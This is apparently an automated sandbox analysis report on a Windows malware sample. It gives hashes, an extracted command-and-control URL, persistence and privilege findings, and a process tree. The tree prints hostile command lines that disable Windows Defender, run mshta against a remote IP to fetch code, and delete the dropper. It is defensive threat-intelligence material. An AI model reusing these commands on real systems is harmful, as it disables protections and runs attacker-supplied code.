Analysis
-
max time kernel
150s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
30-12-2023 13:08
Static task
static1
Behavioral task
behavioral1
Sample
197d8655ed6900478b74c479fe2a1fd9.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
197d8655ed6900478b74c479fe2a1fd9.exe
Resource
win10v2004-20231222-en
General
-
Target
197d8655ed6900478b74c479fe2a1fd9.exe
-
Size
2.2MB
-
MD5
197d8655ed6900478b74c479fe2a1fd9
-
SHA1
0225e85f1d912e719fec67d379f19a28625ceaa6
-
SHA256
73f4622c81dc1eb87d9c018bee31e0b3f61a9e3fccfa7dc6b70501d09c6fed91
-
SHA512
6479e6ed498cdf81ba8e4e726a5f2faa7cc8d7cb2489bbd2bc1db2f277fde6d1ab5a5720bafa7116a5a083c76c1ca415840dd820b83d8d93f992a3b04765781f
-
SSDEEP
49152:7sgqSiGCeSWxUs9cY+fN11ivBzV+3ZYqjuPOBW0wtuVXIPcOU7m6MICD5:7nqFveZb9LKYvT+3SiiO8Lc5OU7a5
Malware Config
Extracted
http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=SCFGBRBT&2=i-s&3=63&4=7601&5=6&6=1&7=99600&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\bilfij.exe" bilfij.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1908 mshta.exe 5 1908 mshta.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 2632 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2692 bilfij.exe -
Loads dropped DLL 2 IoCs
pid Process 2216 197d8655ed6900478b74c479fe2a1fd9.exe 2216 197d8655ed6900478b74c479fe2a1fd9.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2800 sc.exe 2712 sc.exe 2412 sc.exe 2160 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2692 bilfij.exe Token: SeShutdownPrivilege 2692 bilfij.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe 2692 bilfij.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2692 bilfij.exe 2692 bilfij.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2216 wrote to memory of 2800 2216 197d8655ed6900478b74c479fe2a1fd9.exe 28 PID 2216 wrote to memory of 2800 2216 197d8655ed6900478b74c479fe2a1fd9.exe 28 PID 2216 wrote to memory of 2800 2216 197d8655ed6900478b74c479fe2a1fd9.exe 28 PID 2216 wrote to memory of 2800 2216 197d8655ed6900478b74c479fe2a1fd9.exe 28 PID 2216 wrote to memory of 2712 2216 197d8655ed6900478b74c479fe2a1fd9.exe 29 PID 2216 wrote to memory of 2712 2216 197d8655ed6900478b74c479fe2a1fd9.exe 29 PID 2216 wrote to memory of 2712 2216 197d8655ed6900478b74c479fe2a1fd9.exe 29 PID 2216 wrote to memory of 2712 2216 197d8655ed6900478b74c479fe2a1fd9.exe 29 PID 2216 wrote to memory of 2692 2216 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2216 wrote to memory of 2692 2216 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2216 wrote to memory of 2692 2216 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2216 wrote to memory of 2692 2216 197d8655ed6900478b74c479fe2a1fd9.exe 32 PID 2216 wrote to memory of 2632 2216 197d8655ed6900478b74c479fe2a1fd9.exe 34 PID 2216 wrote to memory of 2632 2216 197d8655ed6900478b74c479fe2a1fd9.exe 34 PID 2216 wrote to memory of 2632 2216 197d8655ed6900478b74c479fe2a1fd9.exe 34 PID 2216 wrote to memory of 2632 2216 197d8655ed6900478b74c479fe2a1fd9.exe 34 PID 2692 wrote to memory of 2160 2692 bilfij.exe 39 PID 2692 wrote to memory of 2160 2692 bilfij.exe 39 PID 2692 wrote to memory of 2160 2692 bilfij.exe 39 PID 2692 wrote to memory of 2160 2692 bilfij.exe 39 PID 2692 wrote to memory of 2412 2692 bilfij.exe 35 PID 2692 wrote to memory of 2412 2692 bilfij.exe 35 PID 2692 wrote to memory of 2412 2692 bilfij.exe 35 PID 2692 wrote to memory of 2412 2692 bilfij.exe 35 PID 2692 wrote to memory of 1908 2692 bilfij.exe 36 PID 2692 wrote to memory of 1908 2692 bilfij.exe 36 PID 2692 wrote to memory of 1908 2692 bilfij.exe 36 PID 2692 wrote to memory of 1908 2692 bilfij.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"C:\Users\Admin\AppData\Local\Temp\197d8655ed6900478b74c479fe2a1fd9.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:2800
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:2712
-
-
C:\Users\Admin\AppData\Roaming\bilfij.exeC:\Users\Admin\AppData\Roaming\bilfij.exe2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2412
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.35/soft-usage/favicon.ico?0=1200&1=SCFGBRBT&2=i-s&3=63&4=7601&5=6&6=1&7=99600&8=1033"3⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1908
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\197D86~1.EXE" >> NUL2⤵
- Deletes itself
PID:2632
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
611KB
MD5d3083d9b8ac2945391f688af47b08c29
SHA16f899e0c5c4214b2609a7438499ef6fb3b57a94a
SHA256f5eda3cd9097bd289c39a6d59e0ca22579067da70aaf47d3106b07765a6e0889
SHA51206b5396cae36cbc75160f46597f668e9d5c91d1d9e9896848fb64da4a0c67bc4a3487241bc1ffe9425551163f0792e2da642dc6587c4c808b03306c7bb4aad0f
-
Filesize
98KB
MD5d19350bb32d1c5be83dc645f595af080
SHA16068c2fa3fd51c7b4543944de2d909c06cb6a32e
SHA25636779753b1bf3a673fb61ed5088705cf4a9479a917ecca59608465f8b422e216
SHA512cb14557f1457043d94e348ac9cddba738160e5fec6419d88fa75ba3a71c340a683dd067a29cd9d70b224b529315bff9aa3254b5075e2eaae80c857ad0ffadd74
-
Filesize
92KB
MD594ce672fdf2fa7152761c07b3b40fc48
SHA1518b77a5da108fec2e4df90d64540d27cddb95fb
SHA256003651ade1e5c2992dc903fc5e4d9c4bbacd0b685fcdf664bf79e6c7fa07ecb1
SHA512de5bbb8e7df9ac0bc549d359e323180a02795b24401eb56b575a155c374b4a14fb1a30be5b94f4f61b78b0d2dba77a15b15cd31ea7788017f77480e22c6f5301
-
Filesize
832KB
MD5d9d43b54cdf01ee8e957b3d27fc1e811
SHA19d42857dc253a8e762e89bddf91612a7e0a9a119
SHA25654041ce3c50778cf6313a9dae3befeb5336702a120f6651d6d7e9bc905ce50f3
SHA512648af1efa3687f44195f2a5c5d5ec84244e1d94aa7dcfac0346fe7d39529be13496b11c29de3bbb6e5c0aa7737a9dd710aa19a0d35c3c73d768d5842959e839c
-
Filesize
129KB
MD52cc0d81bda6e99791304654a052970bb
SHA176eb57d7284b028c45591e74828d8a2ac00029a7
SHA256ac5af21e12f618d02843c62b840175c510bb916a8048cd60fdbaa29de3fe8060
SHA512f1d9d08d7b502b0fefb3f67ef7c0af7e335fbffe32650163c0a56860712df286ec01b176d2ac657aee1a1f8cbcacda811a5c145a009e7b39d90528e2c954f895